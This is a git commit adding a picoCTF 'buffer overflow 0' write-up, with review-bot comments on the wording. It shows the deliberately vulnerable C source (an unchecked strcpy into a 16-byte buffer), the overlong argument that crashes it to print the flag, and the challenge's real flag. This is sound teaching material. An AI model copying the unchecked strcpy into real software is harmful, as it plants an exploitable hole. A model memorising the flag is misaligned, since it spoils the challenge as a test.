Commit fc53dc6

Updated buffer overflow 0
1 parent a3d3e6d commit fc53dc6

3 files changed: +67 -2 lines


Binary Exploitation/buffer overflow 0/README.md

+66 -2
@@ -13,9 +13,73 @@ Binary Exploitation
1313
>If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
1414
1515
## Solution
16-
Simple buffer overflow question
16+
We can try pwning the binary locally first. Firstly, create a file _flag.txt_ and add some contents into it.
1717

18-
Working solution [solve.sh](solution/solve.py)
18+
Do a sample run of the program.
19+
20+
```
21+
$ ./vuln
22+
This program takes 1 argument.
23+
```
24+
25+
Ok, now we try with an argument
26+
27+
```
28+
$ ./vuln AAAA
29+
Thanks! Received: AAAA
30+
```
31+
32+
Seems like it's redirecting the input into output. Let's take a look at the source code.
33+
34+
```c
35+
// Imports here...
36+
// Define flag size here...
37+
void sigsegv_handler(int sig) {
38+
fprintf(stderr, "%s\n", flag);
39+
fflush(stderr);
40+
exit(1);
41+
}
42+
43+
void vuln(char *input){
44+
char buf[16];
45+
strcpy(buf, input);
46+
}
47+
48+
int main(int argc, char **argv){
49+
// Reading flag here...
50+
signal(SIGSEGV, sigsegv_handler);
51+
// gid settings here...
52+
if (argc > 1) {
53+
vuln(argv[1]);
54+
printf("Thanks! Received: %s", argv[1]);
55+
}
56+
else
57+
printf("This program takes 1 argument.\n");
58+
return 0;
59+
}
60+
```
61+
62+
It looks like the `signal(SIGSEGV, sigsegv_handler)` redirects execution to `sigsegv_handler()` and prints the flag.
63+
64+
In `vuln()`, there is no boundary checking, so even though there is only space for 16 bytes, it `strcpy()` will keep inserting bytes into `buf`.
65+
66+
We can try running the program again, but this time, with a lot more characters.
67+
68+
```
69+
$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
70+
picoCTF{sample_flag}
71+
```
72+
73+
We did it locally! It takes 28 or more bytes to leak out the flag.
74+
75+
All we have to do is send it to the webshell.
76+
77+
```
78+
$ /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
79+
picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}
80+
```
81+
82+
Working solution [solve.py](solution/solve.py)
1983
2084
### Flag
2185
`picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`
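Review bot: "It takes 28 or more bytes to leak out the flag" presents a crash threshold that is specific to this build as if it were a property of the program. The source only shows `char buf[16]`; how many extra bytes it takes before the clobbered saved frame pointer or return address makes the process fault depends on the compiler's stack layout and padding, which is exactly what the hint quoted at the top of the hunk ("maybe try and add a few more characters") warns about. Suggest: "On this build 28 bytes was enough; the exact count depends on the stack layout, so add more if it does not crash." Two wording points in the same hunk: "it `strcpy()` will keep inserting bytes into `buf`" has a stray "it" and is clearer as "`strcpy()` copies past the end of `buf` until it reaches the NUL that terminates the input"; and "the `signal(SIGSEGV, sigsegv_handler)` redirects execution to `sigsegv_handler()`" skips the step that matters: `signal()` only installs the handler, and the handler runs because the overflow corrupts the saved frame pointer or return address so that returning from `vuln()` faults. Finally, the webshell path `/problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d/vuln` contains an instance-specific hash, so note that the reader's path will differ.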
@@ -0,0 +1 @@
1+
picoCTF{sample_flag}
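Review bot: the new one-line file holding `picoCTF{sample_flag}` appears to be the local test fixture that the README step "create a file _flag.txt_ and add some contents into it" refers to, yet the README never mentions that the repository already ships one; either point the reader at this file or state in the README that any contents will do and this file is only the example used for the local run shown there.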
Binary file not shown.
